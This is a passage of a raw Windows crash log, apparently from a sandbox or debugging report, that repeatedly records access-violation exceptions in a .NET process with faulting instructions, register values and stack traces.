RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254488
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254496
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 48192716
1 0 0

__exception__

stacktrace:
0xc8f9d3
0xc8f8a0
0xc8a3ad
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254360
registers.edi: 4254584
registers.eax: 0
registers.ebp: 4254596
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8fbf5
0xc8f8a0
0xc8a3ad
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254572
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254580
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 46980120
1 0 0

__exception__

stacktrace:
0xc8f9d3
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254360
registers.edi: 4254584
registers.eax: 0
registers.ebp: 4254596
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8fbf5
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254572
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254580
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 45687368
1 0 0

__exception__

stacktrace:
0xc8f9d3
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254360
registers.edi: 4254584
registers.eax: 0
registers.ebp: 4254596
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xc8e740
0xc8fbf5
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254572
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254580
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 45687396
1 0 0

__exception__

stacktrace:
0xc8e740
0x2430b83
0x24303da
0xc8880c
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254948
registers.edi: 4255164
registers.eax: 0
registers.ebp: 4254956
registers.edx: 0
registers.ebx: 4256364
registers.esi: 46212672
registers.ecx: 46219648
1 0 0

__exception__

stacktrace:
0xb43d4c
0xb43c6e
0xb42505
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb43e40
registers.esp: 2026536
registers.edi: 2026588
registers.eax: 0
registers.ebp: 2026600
registers.edx: 5674984
registers.ebx: 2027484
registers.esi: 43389268
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xb4ef56
0xb4ee17
0xb4ed15
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025380
registers.edi: 2025604
registers.eax: 0
registers.ebp: 2025616
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4873128
0xb4f38b
0xb4ee17
0xb4ed15
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025592
registers.edi: 2025880
registers.eax: 0
registers.ebp: 2025600
registers.edx: 0
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 45441280
1 0 0

__exception__

stacktrace:
0xb4ef56
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025380
registers.edi: 2025604
registers.eax: 0
registers.ebp: 2025616
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4873128
0xb4f38b
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025592
registers.edi: 2025880
registers.eax: 0
registers.ebp: 2025600
registers.edx: 0
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 46871764
1 0 0

__exception__

stacktrace:
0xb4ef56
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025380
registers.edi: 2025604
registers.eax: 0
registers.ebp: 2025616
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4873128
0xb4f38b
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025592
registers.edi: 2025880
registers.eax: 0
registers.ebp: 2025600
registers.edx: 0
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 43366956
1 0 0

__exception__

stacktrace:
0x48735ac
0x4873458
0xb4ed15
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
